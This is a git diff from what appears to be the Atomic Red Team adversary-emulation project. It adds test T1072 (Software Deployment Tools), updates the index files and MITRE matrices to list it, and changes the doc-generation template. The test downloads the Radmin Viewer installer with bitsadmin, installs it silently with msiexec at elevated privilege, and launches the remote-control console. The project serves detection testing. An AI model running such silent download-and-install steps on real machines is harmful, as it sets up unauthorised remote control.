T1204 User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1059.005 Visual Basic](../../T1059.005/T1059.005.md) 
@@ -1116,7 +1117,8 @@ - Atomic Test #3: Copy and Execute File with PsExec [windows] - Atomic Test #4: Execute command writing output to local Admin Share [windows] - T1051 Shared Webroot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1072 Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1072 Software Deployment Tools](../../T1072/T1072.md) + - Atomic Test #1: Radmin Viewer Utility [windows] - T1080 Taint Shared Content [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1021.005 VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) diff --git a/atomics/Indexes/Matrices/matrix.md b/atomics/Indexes/Matrices/matrix.md index f910d1e7..d6aa3ef7 100644 --- a/atomics/Indexes/Matrices/matrix.md +++ b/atomics/Indexes/Matrices/matrix.md 
@@ -18,7 +18,7 @@ | Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | JavaScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [COR_PROFILER](../../T1574.012/T1574.012.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DCSync](../../T1003.006/T1003.006.md) | Internet Connection Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SSH [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Inhibit System Recovery](../../T1490/T1490.md) | | Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launchctl](../../T1569.001/T1569.001.md) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Change Default File Association](../../T1546.001/T1546.001.md) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Account](../../T1087.001/T1087.001.md) | SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Traffic Duplication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Internal Defacement](../../T1491.001/T1491.001.md) | | Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launchd](../../T1053.004/T1053.004.md) | [Browser Extensions](../../T1176/T1176.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Code 
Signing Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Groups](../../T1069.001/T1069.001.md) | Shared Webroot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Fast Flux DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Malicious File](../../T1204.002/T1204.002.md) | [COR_PROFILER](../../T1574.012/T1574.012.md) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Compile After Delivery](../../T1027.004/T1027.004.md) | Forced Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Service Scanning](../../T1046/T1046.md) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Malicious File](../../T1204.002/T1204.002.md) | [COR_PROFILER](../../T1574.012/T1574.012.md) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Compile After Delivery](../../T1027.004/T1027.004.md) | Forced Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Service Scanning](../../T1046/T1046.md) | [Software Deployment Tools](../../T1072/T1072.md) | Email Collection [CONTRIBUTE A 
TEST](https://atomicredteam.io/contributing) | | File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Change Default File Association](../../T1546.001/T1546.001.md) | [Container Orchestration Job](../../T1053.007/T1053.007.md) | [Compiled HTML File](../../T1218.001/T1218.001.md) | Forge Web Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Share Discovery](../../T1135/T1135.md) | Taint Shared Content [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Forwarding Rule [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Ingress Tool Transfer](../../T1105/T1105.md) | Reflection Amplification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | [Network Sniffing](../../T1040/T1040.md) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | | [Internal Proxy](../../T1090.001/T1090.001.md) | [Resource Hijacking](../../T1496/T1496.md) | | | [Native API](../../T1106/T1106.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Control Panel](../../T1218.002/T1218.002.md) | [Golden Ticket](../../T1558.001/T1558.001.md) | [Password Policy 
Discovery](../../T1201/T1201.md) | VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | 
@@ -30,7 +30,7 @@ | | Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Default Accounts](../../T1078.001/T1078.001.md) | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Software Discovery](../../T1518.001/T1518.001.md) | | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Non-Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | [Service Execution](../../T1569.002/T1569.002.md) | [Cron](../../T1053.003/T1053.003.md) | Domain Trust Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Delete Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [LSA Secrets](../../T1003.004/T1003.004.md) | [Software Discovery](../../T1518/T1518.md) | | Network Device Configuration Dump [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Non-Standard Port](../../T1571/T1571.md) | | | | Shared Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | [LSASS Memory](../../T1003.001/T1003.001.md) | [System Checks](../../T1497.001/T1497.001.md) | | Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | One-Way Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) | [Deploy Container](../../T1610/T1610.md) | Man-in-the-Middle [CONTRIBUTE A 
TEST](https://atomicredteam.io/contributing) | [System Information Discovery](../../T1082/T1082.md) | | Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | [Software Deployment Tools](../../T1072/T1072.md) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) | [Deploy Container](../../T1610/T1610.md) | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Information Discovery](../../T1082/T1082.md) | | Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Source [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Default Accounts](../../T1078.001/T1078.001.md) | [Dynamic-link Library Injection](../../T1055.001/T1055.001.md) | [Direct Volume Access](../../T1006/T1006.md) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | System Location Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | SNMP (MIB Dump) [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Protocol Impersonation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | System Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Account](../../T1136.002/T1136.002.md) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disable Cloud Logs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [NTDS](../../T1003.003/T1003.003.md) | [System Network Configuration Discovery](../../T1016/T1016.md) | | [Screen Capture](../../T1113/T1113.md) | | Protocol Tunneling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | [Systemd Timers](../../T1053.006/T1053.006.md) | Domain Accounts [CONTRIBUTE A 
TEST](https://atomicredteam.io/contributing) | [Emond](../../T1546.014/T1546.014.md) | Disable Crypto Hardware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Device Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Connections Discovery](../../T1049/T1049.md) | | Sharepoint [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | diff --git a/atomics/Indexes/Matrices/windows-matrix.md b/atomics/Indexes/Matrices/windows-matrix.md index ee76ea53..44c424f0 100644 --- a/atomics/Indexes/Matrices/windows-matrix.md +++ b/atomics/Indexes/Matrices/windows-matrix.md 
@@ -15,12 +15,12 @@ | Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Native API](../../T1106/T1106.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Service Scanning](../../T1046/T1046.md) | Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Spearphishing Attachment](../../T1566.001/T1566.001.md) | [PowerShell](../../T1059.001/T1059.001.md) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Bypass User Account Control](../../T1548.002/T1548.002.md) | Code Signing Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Share Discovery](../../T1135/T1135.md) | [SMB/Windows Admin Shares](../../T1021.002/T1021.002.md) | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Python [CONTRIBUTE A 
TEST](https://atomicredteam.io/contributing) | [Browser Extensions](../../T1176/T1176.md) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Compile After Delivery](../../T1027.004/T1027.004.md) | Forced Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | Shared Webroot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Encrypted Channel](../../T1573/T1573.md) | Firmware Corruption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Scheduled Task](../../T1053.005/T1053.005.md) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Change Default File Association](../../T1546.001/T1546.001.md) | [Compiled HTML File](../../T1218.001/T1218.001.md) | Forge Web Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Policy Discovery](../../T1201/T1201.md) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Inhibit System Recovery](../../T1490/T1490.md) | +| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Scheduled Task](../../T1053.005/T1053.005.md) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Change Default File Association](../../T1546.001/T1546.001.md) | [Compiled HTML File](../../T1218.001/T1218.001.md) | Forge Web Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Policy Discovery](../../T1201/T1201.md) | [Software Deployment 
Tools](../../T1072/T1072.md) | Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Inhibit System Recovery](../../T1490/T1490.md) | | Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Change Default File Association](../../T1546.001/T1546.001.md) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | [Peripheral Device Discovery](../../T1120/T1120.md) | Taint Shared Content [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Forwarding Rule [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Internal Defacement](../../T1491.001/T1491.001.md) | | Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Control Panel](../../T1218.002/T1218.002.md) | [Golden Ticket](../../T1558.001/T1558.001.md) | Permission Groups Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | | Fast Flux DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Valid Accounts [CONTRIBUTE A 
TEST](https://atomicredteam.io/contributing) | [Service Execution](../../T1569.002/T1569.002.md) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Group Policy Preferences](../../T1552.006/T1552.006.md) | [Process Discovery](../../T1057/T1057.md) | VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | Shared Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Query Registry](../../T1012/T1012.md) | [Windows Remote Management](../../T1021.006/T1021.006.md) | [Keylogging](../../T1056.001/T1056.001.md) | | [Ingress Tool Transfer](../../T1105/T1105.md) | Reflection Amplification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [Kerberoasting](../../T1558.003/T1558.003.md) | [Remote System Discovery](../../T1018/T1018.md) | | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Internal Proxy](../../T1090.001/T1090.001.md) | Resource Hijacking [CONTRIBUTE A 
TEST](https://atomicredteam.io/contributing) | +| | [Software Deployment Tools](../../T1072/T1072.md) | Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [Kerberoasting](../../T1558.003/T1558.003.md) | [Remote System Discovery](../../T1018/T1018.md) | | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Internal Proxy](../../T1090.001/T1090.001.md) | Resource Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | System Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Default Accounts](../../T1078.001/T1078.001.md) | [Default Accounts](../../T1078.001/T1078.001.md) | [Keylogging](../../T1056.001/T1056.001.md) | [Security Software Discovery](../../T1518.001/T1518.001.md) | | [Local Data Staging](../../T1074.001/T1074.001.md) | | Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Software Discovery](../../T1518/T1518.md) | | [Local Email Collection](../../T1114.001/T1114.001.md) | | Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | [Visual Basic](../../T1059.005/T1059.005.md) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | Domain Policy Modification [CONTRIBUTE 
A TEST](https://atomicredteam.io/contributing) | [Direct Volume Access](../../T1006/T1006.md) | [LSA Secrets](../../T1003.004/T1003.004.md) | [System Checks](../../T1497.001/T1497.001.md) | | Man in the Browser [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Service Stop](../../T1489/T1489.md) | diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index cf4dc78e..50f26155 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -60499,7 +60499,41 @@ execution: x_mitre_remote_support: true x_mitre_contributors: - Shane Tully, @securitygypsy - atomic_tests: [] + identifier: T1072 + atomic_tests: + - name: Radmin Viewer Utility + auto_generated_guid: b4988cad-6ed2-434d-ace5-ea2670782129 + description: 'An adversary may use Radmin Viewer Utility to remotely control + Windows device, this will start the radmin console. + +' + supported_platforms: + - windows + input_arguments: + radmin_installer: + description: Radmin Viewer installer + type: Path + default: "%TEMP%\\RadminViewer.msi" + radmin_exe: + description: The radmin.exe executable from RadminViewer.msi + type: Path + default: "%PROGRAMFILES(x86)%/Radmin Viewer 3/Radmin.exe" + dependencies: + - description: 'Radmin Viewer Utility must be installed at specified location + (#{radmin_exe}) + +' + prereq_command: 'if not exist "#{radmin_exe}" (exit /b 1) + +' + get_prereq_command: | + echo Downloading radmin installer + bitsadmin /transfer myDownloadJob /download /priority normal "https://www.radmin.com/download/Radmin_Viewer_3.5.2.1_EN.msi" #{radmin_installer} + msiexec /i "#{radmin_installer}" /qn + executor: + name: command_prompt + elevation_required: true + command: '"#{radmin_exe}"' T1153: technique: id: attack-pattern--45d84c8b-c1e2-474d-a14d-69b5de0a2bc0 
@@ -62853,7 +62887,41 @@ lateral-movement: x_mitre_remote_support: true x_mitre_contributors: - Shane Tully, @securitygypsy - atomic_tests: [] + identifier: T1072 + atomic_tests: + - name: Radmin Viewer Utility + auto_generated_guid: b4988cad-6ed2-434d-ace5-ea2670782129 + description: 'An adversary may use Radmin Viewer Utility to remotely control + Windows device, this will start the radmin console. + +' + supported_platforms: + - windows + input_arguments: + radmin_installer: + description: Radmin Viewer installer + type: Path + default: "%TEMP%\\RadminViewer.msi" + radmin_exe: + description: The radmin.exe executable from RadminViewer.msi + type: Path + default: "%PROGRAMFILES(x86)%/Radmin Viewer 3/Radmin.exe" + dependencies: + - description: 'Radmin Viewer Utility must be installed at specified location + (#{radmin_exe}) + +' + prereq_command: 'if not exist "#{radmin_exe}" (exit /b 1) + +' + get_prereq_command: | + echo Downloading radmin installer + bitsadmin /transfer myDownloadJob /download /priority normal "https://www.radmin.com/download/Radmin_Viewer_3.5.2.1_EN.msi" #{radmin_installer} + msiexec /i "#{radmin_installer}" /qn + executor: + name: command_prompt + elevation_required: true + command: '"#{radmin_exe}"' T1080: technique: id: attack-pattern--246fd3c7-f5e3-466d-8787-4c13d9e3b61c diff --git a/atomics/T1072/T1072.md b/atomics/T1072/T1072.md new file mode 100644 index 00000000..346ab27a --- /dev/null +++ b/atomics/T1072/T1072.md @@ -0,0 +1,57 @@ +# T1072 - Software Deployment Tools +## [Description from ATT&CK](https://attack.mitre.org/techniques/T1072) +

Adversaries may gain access to and use third-party software suites installed within an enterprise network, such as administration, monitoring, and deployment systems, to move laterally through the network. Third-party applications and software deployment systems may be in use in the network environment for administration purposes (e.g., SCCM, HBSS, Altiris, etc.). + +Access to a third-party network-wide or enterprise-wide software system may enable an adversary to have remote code execution on all systems that are connected to such a system. The access may be used to laterally move to other systems, gather information, or cause a specific effect, such as wiping the hard drives on all endpoints. + +The permissions required for this action vary by system configuration; local credentials may be sufficient with direct access to the third-party system, or specific domain credentials may be required. However, the system may require an administrative account to log in or to perform it's intended purpose.
+ +## Atomic Tests + +- [Atomic Test #1 - Radmin Viewer Utility](#atomic-test-1---radmin-viewer-utility) + + +
+ +## Atomic Test #1 - Radmin Viewer Utility +An adversary may use Radmin Viewer Utility to remotely control Windows device, this will start the radmin console. + +**Supported Platforms:** Windows + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| radmin_installer | Radmin Viewer installer | Path | %TEMP%\RadminViewer.msi| +| radmin_exe | The radmin.exe executable from RadminViewer.msi | Path | %PROGRAMFILES(x86)%/Radmin Viewer 3/Radmin.exe| + + +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) + + +```cmd +"#{radmin_exe}" +``` + + + + +#### Dependencies: Run with `command_prompt`! +##### Description: Radmin Viewer Utility must be installed at specified location (#{radmin_exe}) +##### Check Prereq Commands: +```cmd +if not exist "#{radmin_exe}" (exit /b 1) +``` +##### Get Prereq Commands: +```cmd +echo Downloading radmin installer +bitsadmin /transfer myDownloadJob /download /priority normal "https://www.radmin.com/download/Radmin_Viewer_3.5.2.1_EN.msi" #{radmin_installer} +msiexec /i "#{radmin_installer}" /qn +``` + + + + +
From 221f3a60270d19b33cc8fa2cb476f6226322fa6f Mon Sep 17 00:00:00 2001 From: Jose Enrique Hernandez Date: Thu, 24 Jun 2021 11:16:09 -0400 Subject: [PATCH 63/84] adding auto generated guids to the md files, closes issue 1501 (#1529) --- atomic_red_team/atomic_doc_template.md.erb | 8 +++++--- bin/generate-atomic-docs.rb | 15 +++++++-------- 2 files changed, 12 insertions(+), 11 deletions(-) diff --git a/atomic_red_team/atomic_doc_template.md.erb b/atomic_red_team/atomic_doc_template.md.erb index dd71601b..62a77d6f 100644 --- a/atomic_red_team/atomic_doc_template.md.erb +++ b/atomic_red_team/atomic_doc_template.md.erb @@ -13,8 +13,10 @@
## Atomic Test #<%= test_number+1 %> - <%= test['name'] %> -<%= test['description'].strip -%> +auto_generated_guid: <%= test['auto_generated_guid'] %> + +<%= test['description'].strip -%> **Supported Platforms:** <%= test['supported_platforms'].collect do |p| case p @@ -31,7 +33,7 @@ end%> <% if test['input_arguments'].to_a.count > 0 %> #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| <% test['input_arguments'].each do |arg_name, arg_options| -%> | <%= cleanup(arg_name) %> | <%= cleanup(arg_options['description']) %> | <%= cleanup(arg_options['type']) %> | <%= cleanup(arg_options['default']) %>| @@ -75,7 +77,7 @@ end%> ##### Description: <%= dep['description'].strip %> ##### Check Prereq Commands: ```<%= get_language(dependency_executor) %> -<%= dep['prereq_command'].strip %> +<%= dep['prereq_command'].strip %> ``` ##### Get Prereq Commands: ```<%= get_language(dependency_executor) %> diff --git a/bin/generate-atomic-docs.rb b/bin/generate-atomic-docs.rb index 83ee3678..f396d563 100755 --- a/bin/generate-atomic-docs.rb +++ b/bin/generate-atomic-docs.rb @@ -63,7 +63,6 @@ class AtomicRedTeamDocs def generate_technique_docs!(atomic_yaml, output_doc_path) technique = ATTACK_API.technique_info(atomic_yaml.fetch('attack_technique')) technique['identifier'] = atomic_yaml.fetch('attack_technique').upcase - template = ERB.new File.read("#{ATOMIC_RED_TEAM_DIR}/atomic_doc_template.md.erb"), nil, "-" generated_doc = template.result(binding) @@ -135,7 +134,7 @@ class AtomicRedTeamDocs puts "Generated Atomic Red Team index at #{output_doc_path}" end - + # # Generates a master Markdown index of ATT&CK Tactic -> Technique -> Atomic Tests # 
@@ -231,16 +230,16 @@ class AtomicRedTeamDocs
 if atomic['supported_platforms'].any? {|platform| platform.downcase =~ /macos/} then has_macos_tests = true end
 if atomic['supported_platforms'].any? {|platform| platform.downcase =~ /^(?!windows|macos).*$/} then has_linux_tests = true end
 end
- if has_windows_tests then
- techniques_win.push(technique)
+ if has_windows_tests then
+ techniques_win.push(technique)
 techniques_win.push(techniqueParent) unless techniques_win.include?(techniqueParent)
 end
- if has_macos_tests then
- techniques_mac.push(technique)
+ if has_macos_tests then
+ techniques_mac.push(technique)
 techniques_mac.push(techniqueParent) unless techniques_mac.include?(techniqueParent)
 end
- if has_linux_tests then
- techniques_lin.push(technique)
+ if has_linux_tests then
+ techniques_lin.push(technique)
 techniques_lin.push(techniqueParent) unless techniques_lin.include?(techniqueParent)
 end
 end
From 575b36a8e62a5642a6bc6722b53bf465dc7e177c Mon Sep 17 00:00:00 2001
